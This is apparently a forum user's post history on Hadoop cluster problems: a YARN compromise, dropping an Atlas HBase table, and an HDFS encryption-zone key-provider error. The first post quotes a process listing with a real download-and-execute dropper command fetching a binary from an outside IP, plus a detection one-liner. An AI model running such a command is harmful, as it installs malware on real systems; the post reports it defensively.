Member since: 06-09-2014

7 Posts | 0 Kudos Received | 0 Solutions
    
	
		
		
01-30-2019 02:43 PM
I have encountered this issue in three different forms on some of our open clusters:

1. Crontab - already covered in the post above.
2. Java process - already covered in the post above.
3. YARN process - we have seen the issue here as a process that runs as the yarn user and launches a container:

# ps -elf
yarn      2239  2238  0 19:56 ?        00:00:00 /bin/bash -c wget http://178.128.173.178/bins/hoho.x86;chmod 777 *;./hoho.x86 Servers
yarn      2248  2239  0 19:56 ?        00:00:00 wget http://178.128.173.178/bins/hoho.x86

Resolution: Make sure you have the correct security groups configured. Do not open ports to the world.
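A quick way to scan for this pattern is to filter the process list for yarn-owned commands that download or execute arbitrary binaries. This is an illustrative sketch, not an exhaustive indicator list; it assumes a Linux host where containers run as the yarn user:

```shell
# Flag processes owned by the yarn user whose command line matches the
# download-and-execute pattern seen in the ps output above.
ps -eo user,pid,args | awk '$1 == "yarn" && /wget|curl|chmod 777/ {print}'
```

Any hit is worth investigating, but a clean result does not prove the cluster is unaffected.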
			
    
	
		
		
08-29-2017 03:03 PM
You have to log in to the HBase shell and remove the atlas_titan table as below, then restart the service:

hbase(main):003:0> list
TABLE
ATLAS_ENTITY_AUDIT_EVENTS
atlas_titan
2 row(s) in 0.0070 seconds
=> ["ATLAS_ENTITY_AUDIT_EVENTS", "atlas_titan"]
hbase(main):005:0> disable 'atlas_titan'
0 row(s) in 2.5060 seconds
hbase(main):006:0> drop 'atlas_titan'
0 row(s) in 1.2730 seconds
hbase(main):007:0> exit

Then restart the Atlas service from the Ambari UI.
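The same steps can be run non-interactively by piping the commands into the HBase shell, which is handy if you need to script this across nodes. A sketch assuming the hbase client is on PATH; the table name comes from the session above:

```shell
# Disable and drop the stale atlas_titan table without an interactive session.
cmds=$(printf "disable 'atlas_titan'\ndrop 'atlas_titan'\nexit\n")
echo "$cmds" | hbase shell
```

As with the interactive session, restart Atlas afterwards so it recreates its storage table.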
		
			
    
	
		
		
09-09-2015 04:50 AM
CDH Version: CDH 5.4.5

Issue: When HDFS encryption is enabled using the KMS available in Hadoop CDH 5.4, I get an error while putting a file into an encryption zone.

Steps:

1. Creating a key [SUCCESS]

[tester@master ~]$ hadoop key create 'TDEHDP' -provider kms://https@10.1.118.1/key_generator/kms -size 128
tde group has been successfully created with options Options{cipher='AES/CTR/NoPadding', bitLength=128, description='null', attributes=null}.
KMSClientProvider[https://10.1.118.1/key_generator/kms/v1/] has been updated.

2. Creating a directory [SUCCESS]

[tester@master ~]$ hdfs dfs -mkdir /user/tester/vs_key_testdir

3. Adding an encryption zone [SUCCESS]

[tester@master ~]$ hdfs crypto -createZone -keyName 'TDEHDP' -path /user/tester/vs_key_testdir
Added encryption zone /user/tester/vs_key_testdir

4. Copying a file to the encryption zone [ERROR]

[tdetester@master ~]$ hdfs dfs -copyFromLocal test.txt /user/tester/vs_key_testdir
15/09/04 06:06:33 ERROR hdfs.KeyProviderCache: Could not find uri with key [dfs.encryption.key.provider.uri] to create a keyProvider !!
copyFromLocal: No KeyProvider is configured, cannot access an encrypted file
15/09/04 06:06:33 ERROR hdfs.DFSClient: Failed to close inode 20823
org.apache.hadoop.ipc.RemoteException(org.apache.hadoop.hdfs.server.namenode.LeaseExpiredException): No lease on /user/tester/vs_key_testdir/test.txt.COPYING (inode 20823): File does not exist. Holder DFSClient_NONMAPREDUCE_1061684229_1 does not have any open files.

Any idea/suggestion will be helpful.
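The first error points at a client-side gap: the HDFS client on the node doing the copy cannot resolve a key provider URI. A hedged check is sketched below; the property name is taken from the error message itself, while the /etc/hadoop/conf path is an assumption about a typical CDH client layout:

```shell
# Print the key provider URI the client actually resolves; an empty result or
# an error suggests the KMS is not configured for this client.
hdfs getconf -confKey dfs.encryption.key.provider.uri

# Cross-check the raw client configuration (path assumed; adjust per install).
grep -A1 'dfs.encryption.key.provider.uri' /etc/hadoop/conf/hdfs-site.xml
```

If the property is missing on the client, the NameNode can still create the zone while plain reads/writes from that client fail exactly as shown above.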